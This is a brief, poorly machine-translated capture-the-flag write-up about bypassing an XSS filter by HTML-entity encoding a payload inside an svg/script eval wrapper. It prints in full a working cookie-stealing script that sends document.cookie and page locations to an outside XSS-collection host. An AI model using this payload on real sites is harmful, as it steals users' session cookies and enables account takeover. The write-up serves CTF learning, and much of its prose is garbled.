Had never done before xss title, this title by writeup do feel it something that record about it
waf of xss bypass
() Are filtered, all the payload into HTML Markup , in fact, add ascii code & #
payload
<svg><script>eval("" + output + "")</script>
output is the following things into HTML Markup coding something that is XSS Platform The platform comes with payload, she did not understand, tidy code format
(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0 &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+ '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+ '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+ '&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
Very clear, document.cookie some of the data obtained in this way get request directly to the internet xss
You can try to directly access
http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&cookie=123
(Id to replace their own projects)
In the corresponding project will receive the corresponding cookie: 1234
There comes a lot of payload, can analyze the past has not succeeded, this finally became one, hhh, there is little excitement
CSP bypass
I'm up here two days, did not find out
substr(md5($str), 0, 6) === “d05a29”
There are a lot of feeling did not write! ! ! To be added